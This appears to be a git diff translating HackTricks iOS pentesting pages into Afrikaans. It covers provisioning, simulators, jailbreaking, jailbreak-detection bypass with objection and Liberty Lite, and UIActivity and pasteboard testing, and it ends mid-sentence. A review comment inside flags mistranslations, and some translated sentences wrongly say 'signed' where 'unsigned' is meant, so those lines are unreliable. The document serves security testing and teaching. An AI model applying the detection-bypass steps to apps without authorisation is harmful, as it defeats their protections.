Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-## Apple Developer Program +## Apple Ontwikkelaarprogram -A **provisioning identity** is a collection of public and private keys that are associated an Apple developer account. In order to **sign apps** you need to pay **99$/year** to register in the **Apple Developer Program** to get your provisioning identity. Without this you won't be able to run applications from the source code in a physical device. Another option to do this is to use a **jailbroken device**. +'n **voorsieningsidentiteit** is 'n versameling openbare en private sleutels wat verband hou met 'n Apple-ontwikkelaarsrekening. Om **toepassings te onderteken**, moet jy **99$/jaar** betaal om te registreer vir die **Apple Ontwikkelaarprogram** om jou voorsieningsidentiteit te kry. Sonder dit sal jy nie in staat wees om programme vanuit die bronkode op 'n fisiese toestel uit te voer nie. 'n Ander opsie om dit te doen, is om 'n **gejailbreakte toestel** te gebruik. -Starting in Xcode 7.2 Apple has provided an option to create a **free iOS development provisioning profile** that allows to write and test your application on a real iPhone. Go to _Xcode_ --> _Preferences_ --> _Accounts_ --> _+_ (Add new Appli ID you your credentials) --> _Click on the Apple ID created_ --> _Manage Certificates_ --> _+_ (Apple Development) --> _Done_\ -\_\_Then, in order to run your application in your iPhone you need first to **indicate the iPhone to trust the computer.** Then, you can try to **run the application in the mobile from Xcode,** but and error will appear. So go to _Settings_ --> _General_ --> _Profiles and Device Management_ --> Select the untrusted profile and click "**Trust**". +Vanaf Xcode 7.2 het Apple 'n opsie verskaf om 'n **gratis iOS-ontwikkelingsvoorsieningsprofiel** te skep wat dit moontlik maak om jou toepassing op 'n werklike iPhone te skryf en te toets. 
Gaan na _Xcode_ --> _Voorkeure_ --> _Rekeninge_ --> _+_ (Voeg nuwe Appli ID by jou geloofsbriewe) --> _Klik op die geskepte Apple ID_ --> _Bestuur Sertifikate_ --> _+_ (Apple Ontwikkeling) --> _Klaar_\ +\_\_Daarna moet jy die iPhone eers **aandui dat dit die rekenaar moet vertrou** voordat jy die toepassing op die iPhone kan probeer uitvoer vanuit Xcode. Gaan na _Instellings_ --> _Algemeen_ --> _Profiel en toestelbestuur_ --> Kies die onvertroue profiel en klik "**Vertrou**". -Note that **applications signed by the same signing certificate can share resources on a secure manner, like keychain items**. +Let daarop dat **toepassings wat deur dieselfde ondertekeningssertifikaat onderteken is, hulpbronne op 'n veilige manier kan deel, soos sleutelkettingitems**. -The provisioning profiles are stored inside the phone in **`/Library/MobileDevice/ProvisioningProfiles`** +Die voorsieningsprofiel word binne die telefoon gestoor in **`/Library/MobileDevice/ProvisioningProfiles`** ## **Simulator** {% hint style="info" %} -Note that a **simulator isn't the same as en emulator**. The simulator just simulates the behaviour of the device and functions but don't actually use them. +Let daarop dat 'n **simulator nie dieselfde as 'n emulator** is nie. Die simulator boots net die gedrag van die toestel en funksies na, maar gebruik dit nie werklik nie. {% endhint %} ### **Simulator** -The first thing you need to know is that **performing a pentest inside a simulator will much more limited than doing it in a jailbroken device**. +Die eerste ding wat jy moet weet, is dat 'n **pentest in 'n simulator baie beperkter sal wees as om dit in 'n gejailbreakte toestel te doen**. -All the tools required to build and support an iOS app are **only officially supported on Mac OS**.\ -Apple's de facto tool for creating/debugging/instrumenting iOS applications is **Xcode**. 
It can be used to download other components such as **simulators** and different **SDK** **versions** required to build and **test** your app.\ -It's highly recommended to **download** Xcode from the **official app store**. Other versions may be carrying malware. +Alle gereedskap wat nodig is om 'n iOS-toepassing te bou en te ondersteun, word **slegs amptelik ondersteun op Mac OS**.\ +Apple se de facto gereedskap vir die skep/debuut/instrumentering van iOS-toepassings is **Xcode**. Dit kan gebruik word om ander komponente soos **simulators** en verskillende **SDK-**weergawes wat nodig is om jou toepassing te bou en te **toets**, af te laai.\ +Dit word sterk aanbeveel om Xcode van die **amptelike app store** af te laai. Ander weergawes kan malware dra. -The simulator files can be found in `/Users//Library/Developer/CoreSimulator/Devices` +Die simulatorlêers kan gevind word in `/Users//Library/Developer/CoreSimulator/Devices` -To open the simulator, run Xcode, then press in the _Xcode tab_ --> _Open Developer tools_ --> _Simulator_\ -\_\_In the following image clicking in "iPod touch \[...]" you can select other device to test in: +Om die simulator oop te maak, voer Xcode uit en druk dan op die _Xcode-tabblad_ --> _Open Developer Tools_ --> _Simulator_\ +\_\_In die volgende prentjie kan jy deur op "iPod touch \[...]" te klik, 'n ander toestel kies om te toets: ![](<../../.gitbook/assets/image (457).png>) ![](<../../.gitbook/assets/image (458).png>) -### Applications in the Simulator - -Inside `/Users//Library/Developer/CoreSimulator/Devices` you may find all the **installed simulators**. If you want to access the files of an application created inside one of the emulators it might be difficult to know **in which one the app is installed**. 
A quick way to **find the correct UID** is to execute the app in the simulator and execute: +### Toepassings in die Simulator +Binne `/Users//Library/Developer/CoreSimulator/Devices` kan jy al die **geïnstalleerde simulators** vind. As jy die lêers van 'n toepassing wat binne een van die simulators geskep is, wil bereik, kan dit moeilik wees om te weet **in watter een die toepassing geïnstalleer is**. 'n Vinnige manier om die korrekte UID te vind, is om die toepassing in die simulator uit te voer en die volgende uit te voer: ```bash xcrun simctl list | grep Booted - iPhone 8 (BF5DA4F8-6BBE-4EA0-BA16-7E3AFD16C06C) (Booted) +iPhone 8 (BF5DA4F8-6BBE-4EA0-BA16-7E3AFD16C06C) (Booted) ``` +Sodra jy die UID weet, kan die geïnstalleerde programme binne dit gevind word in `/Users//Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application` -Once you know the UID the apps installed within it can be found in `/Users//Library/Developer/CoreSimulator/Devices/{UID}/data/Containers/Data/Application` +Egter, verrassend genoeg sal jy die toepassing nie hier vind nie. Jy moet toegang verkry tot `/Users//Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/` -However, surprisingly you won't find the application here. You need to access `/Users//Library/Developer/Xcode/DerivedData/{Application}/Build/Products/Debug-iphonesimulator/` - -And in this folder you can **find the package of the application.** +En in hierdie vouer kan jy **die pakkie van die toepassing vind.** ## Emulator -Corellium is the only publicly available iOS emulator. It is an enterprise SaaS solution with a per user license model and does not offer any trial license. +Corellium is die enigste openlik beskikbare iOS-emulator. Dit is 'n onderneming SaaS-oplossing met 'n lisensiemodel per gebruiker en bied geen proeftydperk lisensie aan nie. 
-## Jailbeaking +## Jailbreaking -Apple strictly requires that the code running on the iPhone must be **signed by a certificate issued by Apple**. **Jailbreaking** is the process of actively **circumventing such restrictions** and other security controls put in places by the OS. Therefore, once the device is jailbroken, the **integrity check** which is responsible for checking apps being installed is patched so it is **bypassed**. +Apple vereis streng dat die kode wat op die iPhone loop, **onderteken moet word deur 'n sertifikaat wat deur Apple uitgereik is**. **Jailbreaking** is die proses om aktief **sodanige beperkings** en ander sekuriteitsbeheermaatreëls wat deur die OS ingestel is, te omseil. Daarom, sodra die toestel gejailbreak is, word die **integriteitskontrole** wat verantwoordelik is vir die kontrole van geïnstalleerde programme, gepatch sodat dit **omseil** word. {% hint style="info" %} -Unlike Android, **you cannot switch to "Developer Mode"** in iOS to run unsigned/untrusted code on the device. +In teenstelling met Android, **kan jy nie oorskakel na "Ontwikkelaarsmodus"** in iOS om ondertekende/ongeverifieerde kode op die toestel uit te voer nie. {% endhint %} ### Android Rooting vs. iOS Jailbreaking -While often compared, **rooting** on Android and **jailbreaking** on iOS are fundamentally different processes. Rooting Android devices might involve **installing the `su` binary** or **replacing the system with a rooted custom ROM**, which doesn't necessarily require exploits if the bootloader is unlocked. **Flashing custom ROMs** replaces the device's OS after unlocking the bootloader, sometimes requiring an exploit. +Alhoewel dit dikwels vergelyk word, is **rooting** op Android en **jailbreaking** op iOS fundamenteel verskillende prosesse. 
Rooting van Android-toestelle mag die **installeer van die `su` binêre lêer** of die **vervang van die stelsel met 'n geroote aangepaste ROM** behels, wat nie noodwendig exploits vereis as die bootloader ontgrendel is nie. **Flashing van aangepaste ROMs** vervang die toestel se bedryfstelsel nadat die bootloader ontgrendel is, en vereis soms 'n exploit. -In contrast, iOS devices cannot flash custom ROMs due to the bootloader's restriction to only boot Apple-signed images. **Jailbreaking iOS** aims to bypass Apple's code signing protections to run unsigned code, a process complicated by Apple's continuous security enhancements. +In teenstelling hiermee kan iOS-toestelle nie aangepaste ROMs flash nie as gevolg van die bootloader se beperking om slegs Apple-ondertekende beelde te laai. **Jailbreaking van iOS** het ten doel om Apple se kode-ondertekeningsbeskerming te omseil om ondertekende kode uit te voer, 'n proses wat gekompliseer word deur Apple se voortdurende sekuriteitsverbeterings. -### Jailbreaking Challenges +### Uitdagings met Jailbreaking -Jailbreaking iOS is increasingly difficult as Apple patches vulnerabilities quickly. **Downgrading iOS** is only possible for a limited time after a release, making jailbreaking a time-sensitive matter. Devices used for security testing should not be updated unless re-jailbreaking is guaranteed. +Jailbreaking van iOS word toenemend moeilik aangesien Apple kwetsbaarhede vinnig patch. **Aftrekking van iOS** is slegs moontlik vir 'n beperkte tydperk na 'n vrystelling, wat jailbreaking 'n tydsensitiewe aangeleentheid maak. Toestelle wat vir sekuriteitstoetsing gebruik word, moet nie opgedateer word tensy herjailbreaking gewaarborg is nie. -iOS updates are controlled by a **challenge-response mechanism** (SHSH blobs), allowing installation only for Apple-signed responses. This mechanism, known as a "signing window", limits the ability to store and later use OTA firmware packages. 
The [IPSW Downloads website](https://ipsw.me) is a resource for checking current signing windows. +iOS-opdaterings word beheer deur 'n **uitdaging-responsmeganisme** (SHSH blobs), wat slegs die installasie van Apple-ondertekende responsies toelaat. Hierdie meganisme, bekend as 'n "ondertekeningsvenster", beperk die vermoë om OTA-firmwarepakette te stoor en later te gebruik. Die [IPSW Downloads-webwerf](https://ipsw.me) is 'n bron vir die nagaan van die huidige ondertekeningsvensters. -### Jailbreak Varieties +### Verskillende Jailbreak-variëteite -- **Tethered jailbreaks** require a computer connection for each reboot. -- **Semi-tethered jailbreaks** allow booting into non-jailbroken mode without a computer. -- **Semi-untethered jailbreaks** require manual re-jailbreaking without needing a computer. -- **Untethered jailbreaks** offer a permanent jailbreak solution without the need for re-application. +- **Tethered jailbreaks** vereis 'n rekenaarkoppeling vir elke herlaai. +- **Semi-tethered jailbreaks** maak dit moontlik om in nie-gejailbreakte modus te herlaai sonder 'n rekenaar. +- **Semi-untethered jailbreaks** vereis handmatige herjailbreaking sonder 'n rekenaar. +- **Untethered jailbreaks** bied 'n permanente jailbreak-oplossing sonder die behoefte aan heraanwending. -### Jailbreaking Tools and Resources +### Jailbreaking-hulpmiddels en -hulpbronne -Jailbreaking tools vary by iOS version and device. Resources such as [Can I Jailbreak?](https://canijailbreak.com), [The iPhone Wiki](https://www.theiphonewiki.com), and [Reddit Jailbreak](https://www.reddit.com/r/jailbreak/) provide up-to-date information. Examples include: +Jailbreaking-hulpmiddels verskil volgens die iOS-weergawe en toestel. Hulpbronne soos [Can I Jailbreak?](https://canijailbreak.com), [The iPhone Wiki](https://www.theiphonewiki.com) en [Reddit Jailbreak](https://www.reddit.com/r/jailbreak/) bied opgedateerde inligting. 
Voorbeelde sluit in: -- [Checkra1n](https://checkra.in/) for A7-A11 chip devices. -- [Palera1n](https://palera.in/) for Checkm8 devices (A8-A11) on iOS 15.0-16.5. -- [Unc0ver](https://unc0ver.dev/) for iOS versions up to 14.8. +- [Checkra1n](https://checkra.in/) vir A7-A11 chip-toestelle. +- [Palera1n](https://palera.in/) vir Checkm8-toestelle (A8-A11) op iOS 15.0-16.5. +- [Unc0ver](https://unc0ver.dev/) vir iOS-weergawes tot 14.8. -Modifying your device carries risks, and jailbreaking should be approached with caution. +Die wysiging van jou toestel dra risiko's, en jailbreaking moet met omsigtigheid benader word. -### Jailbreaking Benefits and Risks +### Voordele en Risiko's van Jailbreaking -Jailbreaking **removes OS-imposed sandboxing**, allowing apps to access the entire filesystem. This freedom enables the installation of unapproved apps and access to more APIs. However, for regular users, jailbreaking is **not recommended** due to potential security risks and device instability. +Jailbreaking **verwyder die deur die OS opgelegde sandboksing**, wat dit vir programme moontlik maak om toegang tot die hele lêersisteem te verkry. Hierdie vryheid maak die installasie van nie-goedgekeurde programme en toegang tot meer API's moontlik. Vir gewone gebruikers word jailbreaking egter **nie aanbeveel nie** as gevolg van potensiële sekuriteitsrisiko's en toestel-onstabiliteit. 
-### **After Jailbreaking** +### **Na Jailbreaking** {% content-ref url="basic-ios-testing-operations.md" %} [basic-ios-testing-operations.md](basic-ios-testing-operations.md) {% endcontent-ref %} -### **Jailbreak Detection** +### **Jailbreak-opsporing** -**Several applications will try to detect if the mobile is jailbroken and in that case the application won't run** +**Verskeie programme sal probeer om vas te stel of die mobiele toestel gejailbreak is, en in daardie geval sal die toepassing nie uitgevoer word nie** -* After jailbreaking an iOS **files and folders are usually installed**, these can be searched to determine if the device is jailbroken. -* In a jailbroken device applications get **read/write access to new files** outside the sandbox -* Some **API** **calls** will **behave differently** -* The presence of the **OpenSSH** service -* Calling `/bin/sh` will **return 1** instead of 0 +* Nadat iOS gejailbreak is, word **lêers en vouers gewoonlik geïnstalleer**, en dit kan ondersoek word om vas te stel of die toestel gejailbreak is. +* Op 'n gejailbreakte toestel kry programme **lees-/skryftoegang tot nuwe lêers** buite die sandboks. +* Sommige **API-oproepe** sal **anders optree**. +* Die teenwoordigheid van die **OpenSSH-diens** +* Die aanroep van `/bin/sh` sal **1 teruggee** in plaas van 0 -**More information about how to detect jailbreaking** [**here**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**.** +**Meer inligting oor hoe om jailbreaking op te spoor** [**hier**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**.** -You can try to avoid this detections using **objection's** `ios jailbreak disable` +Jy kan probeer om hierdie opsporings te vermy deur gebruik te maak van die `ios jailbreak disable`-funksie van **objection**. 
-## **Jailbreak Detection Bypass** +## **Jailbreak-opsporingsverbygaan** -* You can try to avoid this detections using **objection's** `ios jailbreak disable` -* You could also install the tool **Liberty Lite** (https://ryleyangus.com/repo/). Once the repo is added, the app should appear in the ‘Search’ tab +* Jy kan probeer om hierdie opsporings te vermy deur gebruik te maak van die `ios jailbreak disable`-funksie van **objection**. +* Jy kan ook die hulpmiddel **Liberty Lite** installeer (https://ryleyangus.com/repo/). Sodra die repo bygevoeg is, behoort die toepassing in die 'Soek'-tabblad te verskyn. -## References +## Verwysings * [https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/](https://mas.owasp.org/MASTG/iOS/0x06b-iOS-Security-Testing/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
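Review bot: two sentences in the Jailbreaking section invert the meaning of the original. The hint `+In teenstelling met Android, **kan jy nie oorskakel na "Ontwikkelaarsmodus"** in iOS om ondertekende/ongeverifieerde kode op die toestel uit te voer nie` renders "unsigned/untrusted code" as "ondertekende" (signed), and `+**Jailbreaking van iOS** het ten doel om Apple se kode-ondertekeningsbeskerming te omseil om ondertekende kode uit te voer` turns "run unsigned code" into running signed code; both should read "onondertekende". Two further mistranslations change the technical sense: "Aftrekking van iOS" for "Downgrading iOS" means subtraction (suggest "afgradering"), and "skep/debuut/instrumentering" renders "debugging" as "debuut", i.e. a debut (suggest "ontfouting"). In the `xcrun simctl list | grep Booted` block the output line loses its indentation (`- iPhone 8 (...) (Booted)` becomes `+iPhone 8 (...) (Booted)`), which removes the visual cue separating command from output; code fences should not be touched by the translation. Finally, the sentence about avoiding detection with objection's `ios jailbreak disable` appears at the end of "Jailbreak-opsporing" and again as the first bullet of "Jailbreak-opsporingsverbygaan"; the duplicate exists in the English source as well, but dropping one copy here would be cheap, as would fixing the carried-over "Appli ID" typo in the Xcode steps.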
diff --git a/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md b/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md index 82d9bc197..facbc78c0 100644 --- a/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md +++ b/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md @@ -1,82 +1,78 @@ -# iOS UIActivity Sharing +# iOS UIActivity-deling
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# UIActivity Sharing Simplified +# Vereenvoudigde UIActivity-deling -From iOS 6 onwards, third-party applications have been enabled to **share data** such as text, URLs, or images using mechanisms like AirDrop, as outlined in Apple's [Inter-App Communication guide](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3). This feature manifests through a system-wide _share activity sheet_ that surfaces upon interacting with the "Share" button. +Vanaf iOS 6 is derde-party-toepassings in staat gestel om **data te deel**, soos teks, URL's of afbeeldings, deur gebruik te maak van meganismes soos AirDrop, soos uiteengesit in Apple se [Inter-App Communication-gids](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3). Hierdie funksie manifesteer deur middel van 'n stelselwye _deelaktiwiteitsblad_ wat na vore kom wanneer die "Deel" knoppie geaktiveer word. -A comprehensive enumeration of all the built-in sharing options is available at [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Developers may opt to exclude specific sharing options if they deem them unsuitable for their application. +'n Omvattende opsomming van al die ingeboude deelopsies is beskikbaar by [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Ontwikkelaars kan opsioneel spesifieke deelopsies uitsluit as hulle dit ongeskik ag vir hul toepassing. -## **How to Share Data** +## **Hoe om Data te Deel** -Attention should be directed towards: +Aandag moet gegee word aan: -- The nature of the data being shared. -- The inclusion of custom activities. -- The exclusion of certain activity types. 
- -Sharing is facilitated through the instantiation of a `UIActivityViewController`, to which the items intended for sharing are passed. This is achieved by calling: +- Die aard van die gedeelde data. +- Die insluiting van aangepaste aktiwiteite. +- Die uitsluiting van sekere aktiwiteitstipes. +Deling word fasiliteer deur die instansiasie van 'n `UIActivityViewController`, waarin die items wat bedoel is om gedeel te word, oorgedra word. Dit word bereik deur die volgende te roep: ```bash $ rabin2 -zq Telegram\ X.app/Telegram\ X | grep -i activityItems 0x1000df034 45 44 initWithActivityItems:applicationActivities: ``` +Ontwikkelaars moet die `UIActivityViewController` noukeurig ondersoek vir die aktiwiteite en aangepaste aktiwiteite waarmee dit geïnisialiseer is, sowel as enige gespesifiseerde `excludedActivityTypes`. -Developers should scrutinize the `UIActivityViewController` for the activities and custom activities it's initialized with, as well as any specified `excludedActivityTypes`. +## **Hoe om Data te Ontvang** -## **How to Receive Data** +Die volgende aspekte is van kritieke belang wanneer data ontvang word: -The following aspects are crucial when receiving data: +- Die verklaring van **aangepaste dokumenttipes**. +- Die spesifikasie van **dokumenttipes wat die app kan oopmaak**. +- Die verifikasie van die **integriteit van die ontvangste data**. -- The declaration of **custom document types**. -- The specification of **document types the app can open**. -- The verification of the **integrity of the received data**. +Sonder toegang tot die bronkode kan 'n persoon steeds die `Info.plist` ondersoek vir sleutels soos `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, en `CFBundleDocumentTypes` om te verstaan watter tipes dokumente 'n app kan hanteer en verklaar. 
-Without access to the source code, one can still inspect the `Info.plist` for keys like `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, and `CFBundleDocumentTypes` to understand the types of documents an app can handle and declare. +'n Bondige gids oor hierdie sleutels is beskikbaar op [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), wat die belangrikheid beklemtoon van die definieer en invoer van UTIs vir stelselwye herkenning en die assosiasie van dokumenttipes met jou app vir integrasie in die "Open met" dialoog. -A succinct guide on these keys is available on [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), highlighting the importance of defining and importing UTIs for system-wide recognition and associating document types with your app for integration in the "Open With" dialogue. +## Dinamiese Toetsbenadering -## Dynamic Testing Approach +Om **aktiwiteite te toets** wat gestuur word, kan 'n persoon: -To test **sending activities**, one could: +- Inhaak op die `init(activityItems:applicationActivities:)` metode om die items en aktiwiteite wat gedeel word, vas te vang. +- Uitgeslote aktiwiteite identifiseer deur die `excludedActivityTypes` eienskap te onderskep. -- Hook into the `init(activityItems:applicationActivities:)` method to capture the items and activities being shared. -- Identify excluded activities by intercepting the `excludedActivityTypes` property. +Vir die **ontvang van items**, behels dit: -For **receiving items**, it involves: +- Om 'n lêer met die app te deel vanaf 'n ander bron (bv. AirDrop, e-pos) wat die "Open met..." dialoog uitlok. +- Om `application:openURL:options:` te onderskep, tesame met ander metodes wat geïdentifiseer is tydens statiese analise, om die app se reaksie waar te neem. 
+- Om gebrekkige lêers of fuzzing-tegnieke te gebruik om die robuustheid van die app te evalueer. -- Sharing a file with the app from another source (e.g., AirDrop, email) that prompts the "Open with..." dialogue. -- Hooking `application:openURL:options:` among other methods identified during static analysis to observe the app's response. -- Employing malformed files or fuzzing techniques to evaluate the app's robustness. - -## References +## Verwysings * [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-uipasteboard.md b/mobile-pentesting/ios-pentesting/ios-uipasteboard.md index bc2afeb33..8a41fbdfe 100644 --- a/mobile-pentesting/ios-pentesting/ios-uipasteboard.md +++ b/mobile-pentesting/ios-pentesting/ios-uipasteboard.md @@ -1,54 +1,51 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Data sharing within and across applications on iOS devices is facilitated by the [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard) mechanism, which is divided into two primary categories: +Data-deling binne en tussen programme op iOS-toestelle word gefasiliteer deur die [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard) meganisme, wat verdeel is in twee primêre kategorieë: -- **Systemwide general pasteboard**: This is used for sharing data with **any application** and is designed to persist data across device restarts and app uninstallations, a feature that has been available since iOS 10. -- **Custom / Named pasteboards**: These are specifically for data sharing **within an app or with another app** that shares the same team ID, and are not designed to persist beyond the life of the application process that creates them, following changes introduced in iOS 10. +- **Stelselwye algemene plakbord**: Dit word gebruik vir die deling van data met **enige toepassing** en is ontwerp om data te behou oor toestelherstarts en 